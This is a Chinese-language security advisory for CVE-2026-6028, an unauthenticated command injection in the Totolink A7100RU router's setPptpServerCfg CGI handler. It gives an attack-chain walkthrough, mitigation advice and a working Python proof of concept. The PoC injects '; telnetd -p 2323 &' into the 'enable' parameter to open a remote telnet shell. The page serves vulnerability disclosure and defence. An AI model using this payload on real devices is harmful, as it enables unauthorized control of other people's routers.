IPBUF安全漏洞报告
English
CVE-2026-6028 CVSS 9.8 严重

CVE-2026-6028 Totolink A7100RU远程命令注入漏洞

披露日期: 2026-04-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6028
漏洞类型
操作系统命令注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Totolink A7100RU

相关标签

RCECommand InjectionTotolinkIoTRouter

漏洞概述

Totolink A7100RU路由器在固件版本7.4cu.2313_b20191024中存在严重安全漏洞。受影响的组件为CGI处理程序中的`/cgi-bin/cstecgi.cgi`文件,具体涉及`setPptpServerCfg`函数。由于对参数`enable`的处理缺乏有效过滤,攻击者可利用该漏洞发起远程攻击,注入并执行任意操作系统命令,从而完全控制受影响设备。

技术细节

该漏洞源于Totolink A7100RU的CGI接口未能正确过滤用户输入。在`/cgi-bin/cstecgi.cgi`脚本调用的`setPptpServerCfg`函数中,`enable`参数直接被传递给后台系统命令执行环境,未经过严格的消毒处理。攻击者可以通过构造恶意的HTTP POST请求,向该参数注入Shell元字符(如`;`、`|`或`` ` ``)。由于CVSS向量显示无需用户交互且无需认证(PR:N),攻击者可直接通过网络(AV:N)发送 payload。服务器在解析请求后,会将恶意参数拼接到系统命令中执行,从而实现远程代码执行(RCE),获取最高权限。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别出暴露的Totolink A7100RU设备。
STEP 2
制作Payload
攻击者构造包含恶意Shell命令的HTTP POST数据包,针对`setPptpServerCfg`接口的`enable`参数进行注入。
STEP 3
发送请求
攻击者向目标设备的`/cgi-bin/cstecgi.cgi`发送恶意请求,无需认证即可利用漏洞。
STEP 4
命令执行
服务器端CGI程序解析请求,将`enable`参数拼接至系统命令并执行,触发恶意代码。
STEP 5
建立控制
恶意命令执行成功后,攻击者获得设备Shell权限,可完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi" headers = {"Content-Type": "application/json"} # Payload to inject OS command, e.g., telnetd payload = "; telnetd -p 2323 &" data = { "topicurl": "setPptpServerCfg", "enable": payload } try: response = requests.post(target_url, json=data, headers=headers, timeout=5) print(f"Status Code: {response.status_code}") print("Check if telnet service started on port 2323") except Exception as e: print(f"Exploit failed: {e}")

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施
若无法立即升级,请务必在防火墙上阻断外部对路由器管理端口(通常为80/443)的访问,并仅通过受信任的局域网连接进行管理操作,以降低被攻击风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表